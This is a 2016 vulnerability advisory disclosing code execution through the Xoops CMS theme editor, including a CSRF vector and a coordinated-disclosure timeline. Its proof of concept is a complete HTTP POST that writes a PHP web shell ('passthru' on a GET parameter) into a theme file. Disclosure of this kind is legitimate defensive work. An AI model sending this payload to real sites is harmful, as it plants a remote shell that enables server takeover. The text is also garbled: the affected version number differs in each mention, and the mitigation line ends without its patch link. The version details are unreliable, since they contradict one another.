Xoops 220.127.116.11: Code ExecutionDate: 2016-01-28 09:44:26
|Affected Product:||Xoops 18.104.22.168|
|Vulnerability Type:||Code Execution|
|Reported to vendor:||11/21/2015|
|Disclosed to public:||01/28/2016|
|Release mode:||Coordinated Release|
|CVE:||requested, but not assigned|
|Credits||Tim Coen of curesec GmbH|
Xoops is a content management system written in PHP. In version 22.214.171.124, it is vulnerable to code execution.
The theme editor allows the editing of CSS and HTML files. However, an authenticated attacker can edit the request to create new PHP files, leading to code execution.
An admin account is required for successful exploitation, but the request does not have CSRF protection, making CSRF an additional attack vector for this issue.
3. Proof of Concept
POST /xoops-126.96.36.199/htdocs/modules/system/admin.php?fct=tplsets&op=tpls_save HTTP/1.1 templates=<?php passthru($_GET['x']);&path_file=%2Fvar%2Fwww%2Fxoops-188.8.131.52%2Fhtdocs%2Fthemes%2Fdefault%2Fstyle.php&file=style.php&ext=php
To mitigate this issue please apply the security patch:
Please note that a newer version might already be available.
5. Report Timeline
|11/21/2015||Informed Vendor about Issue (no reply)|
|12/10/2015||CVE requested, but not assigned|
|12/10/2015||Reminded Vendor of Disclosure Date|
|12/11/2015||Vendor requests more time|
|01/02/2016||Vendor releases patch|
|01/28/2016||Disclosed to public|